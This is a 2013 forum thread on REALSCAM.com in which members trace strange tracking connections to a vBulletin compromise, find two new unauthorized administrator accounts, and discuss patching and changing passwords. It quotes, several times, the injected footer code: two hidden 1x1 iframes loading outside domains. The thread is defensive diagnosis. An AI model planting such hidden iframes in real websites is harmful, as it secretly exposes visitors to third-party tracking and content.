-
Strange Connections
I'm probably about to embarrass myself again, but the board is doing something which to my non-expert eye seems strange.
When I just logged on, the board made various quick connections to and from sites such as googleleads, doubleclick, contextweb, adnxs and others. Those are advertising/tracking sites. It seems a fair assumption that the board was sending them my IP. Sites such as these build profiles of individuals' browsing habits to sell them. I don't log in that often, but this has happened the last couple of times I did.
In addition, just now and the last time I logged in McAfee blocked a connection the board attempted to make to an IP it deemed unsafe, 216.38.163.167. This resolves to something called "Mirror Image". I'm not sure either why McAfee thinks it unsafe or why the board attempted the connection, but thought I'd relate it.
You guys know about this?
"A wise man proportions belief to the evidence."
- David Hume
-
Re: Strange Connections
Your concerns are not strange at all, Wes.
I'm not sure why McAfee is blocking mirror-image.com. My security software is not.
mirror-image.com is a completely reputable Content Delivery Network, essential for the smooth operating of many websites
Mirror Image Internet is more than just a Content Delivery Network (CDN). Our patented, global Dynamic Delivery Network (DDN) solutions leverage the unlimited capacity of our global Content Access Point® (CAP) network to guarantee availability and unsurpassed performance—even during peak traffic periods
FYI, many of the connections are to graphics members have included in posts. The forum links to the graphics source and retrieves the image every time someone attempts to view it.
This is one of the reasons many forums discourage the use of linked graphics. Such linking consumes bandwidth and server capacity and can lead to graphic heavy pages loading slowly (as happens in any of the graphic heavy posts in the cash gifting subforum here on REALSCAM.com
As I post, the forum is linking to:
ajaxgoogleapis.com
ajax.googleapis.com is a CDN repository for the popular jquery javescript functionality plus others that modern websites utilise. If you block this then you will stop the website functioning as it was designed to work
damnxd.com
We are the best Funny Pics website on the web. We update our site everyday with hundreds of new funny pics.
jobless-jack.com
Jobless Jack | MEME | TROLLS | CLOSE ENOUGH | FUNN
weirdstuffs.com
BBM Display Pictures | Facebook Covers | Jokes
Facebook.com
Google.com
I would encourage anyone using Firefox who is concerned with cross-site requests to install the Request Policy Firefox addon
RequestPolicy is an extension for Mozilla browsers that increases your browsing privacy, security, and speed by giving you control over cross-site requests.
The only thing necessary for the triumph of evil is for good men to do nothing
-
Re: Strange Connections
lijit.com, w55c.net, c3tag.com, burstnet.com and several more. And all of these sites are leaving tracking cookies - I just checked. I normally use Firefox, so I just fired up Chrome - same connections.
I agree that I don't know why McAfee is suspicious of Mirror Image. And I agree that the connections you listed simply serve to retrieve legitimate content. But all of the sites (other than Mirror Image) I listed are in the tracking and selling business. This is not the worst thing in the world, but other sites don't do it.
Thanks for your reply, LRM, but I still think it's strange.
"A wise man proportions belief to the evidence."
- David Hume
-
Post Thanks / Like - 0 Thanks, 1 Likes, 0 LMAO, 0 Dislikes, 0 Ignorant, 0 Moron
1 Member(s) liked this post
-
Re: Strange Connections
That's strange, Wes.
I'm not getting any of those tracking cookie requests, nor do I have any of them showing in my cookie folder.
We'll check it out.
Thanks for the info
The only thing necessary for the triumph of evil is for good men to do nothing
-
Re: Strange Connections
I had an 'ad.yieldmanager' popup on my phone from here the other day.
-
Re: Strange Connections
OK, I have had this happen twice, ads have started to play on my computer. Almost like a video ad. As soon as I shut down the site, the ad stops. Happened yeterday and just a second ago.
-
Re: Strange Connections
It's continuing for me as well. If it helps, a few more connections: hiroserver.com, invitemedia.com, dotomi.com, advertising/tracking sites all. And there are more. I don't think any of these are dangerous, but why is the board doing that?
"A wise man proportions belief to the evidence."
- David Hume
-
Re: Strange Connections
I've also been seeing a barrage of unfamiliar sites loading when I visit the Realscam homepage.
Could something have slipped past Jason and gotten imbedded? Or another 1 pixel graphic like MMB pulled on us a while back?
On the other hand, I don't get the video ad popup, probably due to how my system is set up.
-
Re: Strange Connections
A while back I kept seeing embedded links in posts and I assumed it was the site. After some investigation it turned out my computer was infected. I was the only one at that time seeing the live links popping up all over the place.
As for the issues several of you are experiencing I am not seeing anything. I will alert Jason and Glim. The owner has been tied up but will be checking it out as well. All this does make me miss the simple times and my dial phone just a wee bit!
-
Post Thanks / Like - 0 Thanks, 1 Likes, 0 LMAO, 0 Dislikes, 0 Ignorant, 0 Moron
1 Member(s) liked this post
-
Re: Strange Connections
Originally Posted by
Soapboxmom
All this does make me miss the simple times and my dial phone just a wee bit!
I was never alive for the simple times, but I feel ya.
-
Re: Strange Connections
There is definitely something wrong, on a dry run accessing forum.php launches a rollercoaster of cookies from other sites, looks like all originated first from jobless-jack.com
and damnxd.org (and this is on a page which does not have any non stock images)
RS_cookies.jpg
Jason, what is a purpose of having these iframe lines included in forum.php ?
Code:
<div id="footer_morecopyright" class="shade footer_morecopyright">
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
<br/><br/><iframe src="http://damnxd.org/dns.html" width="1" height="1"></iframe><br/><iframe src="http://www.jobless-jack.com/" width="1" height="1"></iframe><br/>
</div>
The comment about "do not remove" looks very fishy to me
Last edited by NikSam; 09-06-2013 at 09:47 AM.
-
Post Thanks / Like - 0 Thanks, 1 Likes, 0 LMAO, 0 Dislikes, 0 Ignorant, 0 Moron
1 Member(s) liked this post
-
Re: Strange Connections
The same thing is happening from my office computer.
"A wise man proportions belief to the evidence."
- David Hume
-
Re: Strange Connections
Originally Posted by
NikSam
There is definitely something wrong, on a dry run accessing forum.php launches a rollercoaster of cookies from other sites, looks like all originated first from
jobless-jack.com
and
damnxd.org (and this is on a page which does not have any non stock images)
RS_cookies.jpg
Jason, what is a purpose of having these iframe lines included in forum.php ?
Code:
<div id="footer_morecopyright" class="shade footer_morecopyright">
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
<br/><br/><iframe src="http://damnxd.org/dns.html" width="1" height="1"></iframe><br/><iframe src="http://www.jobless-jack.com/" width="1" height="1"></iframe><br/>
</div>
The comment about "do not remove" looks very fishy to me
Have been occupied with moving to a new place but I reported it to SBM the other day when I started getting all these weird links popping up. I am mainly using Chrome now and it does not happen on any other sites that I visit. As of 9/11/2013, it is still happening when I login to RS.
Don't get ripped off!! Stay informed!
-
Re: Strange Connections
I don't automatically accept cookies so I get to see these just asked to be set when I tried to access this site from a different computer:
widget3.linkwithin.com
widget5.linkwithin.com
widget6.linkwithin.com
jobless-jack.com
damnxd.org
whos.amung.us
rc.rlcdn.com
lb.adnxs.com
idsync.rlcdn.com
-
Re: Strange Connections
So, anybody gonna remove that infected HTML code ?
as VB original template shows:
Code:
<div id="footer_morecopyright" class="shade footer_morecopyright">
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
{vb:raw cronimage}
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
{vb:raw vboptions.copyrighttext}
</div>
Those infectious iframes are more likely coming from vboptions.copyrighttext variable.
and resulting in:
Code:
<div id="footer_morecopyright" class="shade footer_morecopyright">
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
<!-- Do not remove cronimage or your scheduled tasks will cease to function -->
<br/><br/><iframe src="http://damnxd.org/dns.html" width="1" height="1"></iframe><br/><iframe src="http://www.jobless-jack.com/" width="1" height="1"></iframe><br/>
</div>
Please verify that this code was put by someone in AdminCP > Settings > Options > Site Name / URL / Contact Details > Copyright Text
And change admin passwords. (might also have come from penetrating MySQL db)
Last edited by NikSam; 09-13-2013 at 06:24 AM.
-
Re: Strange Connections
UPDATE: It seems to be VB exploit, so make sure to install latest fixes, so it doesn't not happen again after removal of Copyright Text,
check for suspicious new admin accounts, php files which appeared not from stock VBulletin setup, and modifications to stock php files.
https://forums.digitalpoint.com/thre...erted.2679354/
to remove Copyright Text as pointed out there:
You should've able to go into your options and edit the copyrighttext field. I think it might be hidden, so you will need to be in debug mode to see it in there.
more details on the exploit: http://www.vbulletin.com/forum/forum...-1-vbulletin-5
Last edited by NikSam; 09-13-2013 at 06:49 AM.
-
Re: Strange Connections
Thanks for the info. We will get the owner on it this weekend.
-
Re: Strange Connections
See the PC World article as well. Especially this part:
It’s not clear what the exploit currently being investigated would allow potential attackers to do, but the fact that it prompted an advance warning from the developers suggests that it might have serious implications.
Luke [vBulletin tech guru - WS] declined to disclose information about the nature of the exploit.
I don't like that. I suggest that users must view their passwords to this site as compromised - if you use your RS password for anything else that matters to you, you ought to change the others. Now.
And why on God's green earth would anyone not delete the install directory? I think I recall that phpBB (which Quatloos runs on) won't even start until the install directory is gone.
I would even consider shutting down the board until this is fixed.
"A wise man proportions belief to the evidence."
- David Hume
-
Re: Strange Connections
Originally Posted by
wserra
... I suggest that users must view their passwords to this site as compromised ...
Passwords in VB are stored as hashes, so if it is not dictionary word, short, easy to brute force not likely will be compromised.
But I agree, as a general rule never use the same password for different sites, get a password management program if you must,
or at least come up with a scheme to generate pass for sites (like for GMail - mypass_gm)
Most critical password a person has is to their email , even if you think there is nothing else worth reading for someone, it can be used
to reset your passwords on other sites (Banks, Paypal, etc.)
-
Re: Strange Connections
Originally Posted by
NikSam
Passwords in VB are stored as hashes, so if it is not dictionary word, short, easy to brute force not likely will be compromised.
So were the passwords in ubuntuforums.org, also running VB, hacked a couple of months ago (perhaps in part by the same exploit). Nonetheless, IIRC, the Ubuntu folks advised everyone to change passwords, especially if used on other sites. No?
"A wise man proportions belief to the evidence."
- David Hume
-
Re: Strange Connections
Ok, i Already spotted new created Administrators:
View Profile: .
View Profile: sky22
-
Re: Strange Connections
Originally Posted by
NikSam
Both created last week.
Dum-da-DUM-DUM.
"A wise man proportions belief to the evidence."
- David Hume
-
Re: Strange Connections
Would someone update, the non techy users as to what this means and a course of action. I am running AVG internet security, and recently added Malwarebytes at the suggestion of another forum member. So far my scans come back clean, but have no idea what any of this means behind the scenes.
-
Re: Strange Connections
Ribshaw, your protections are only good for your own PC.
The RS itself been compromised/hacked/penetrated exploiting
a programming mistake in VBulletin software on which this forum runs on.
Whoever did put those hidden iframes are just generating views to their ads, even that you cannot see those ads (they hidden in two 1x1 frames in the bottom which are invisible)
But since the vulnerability is not addressed, anybody else can repeat the hack for other purposes and perhaps already did too.
They can steal database of users, install additional backdoors, modify content, etc...
-
Post Thanks / Like - 0 Thanks, 1 Likes, 0 LMAO, 0 Dislikes, 0 Ignorant, 0 Moron
1 Member(s) liked this post
-
Re: Strange Connections
Think of it as RS having gained two new admins from the Russian mob.
"A wise man proportions belief to the evidence."
- David Hume
Bookmarks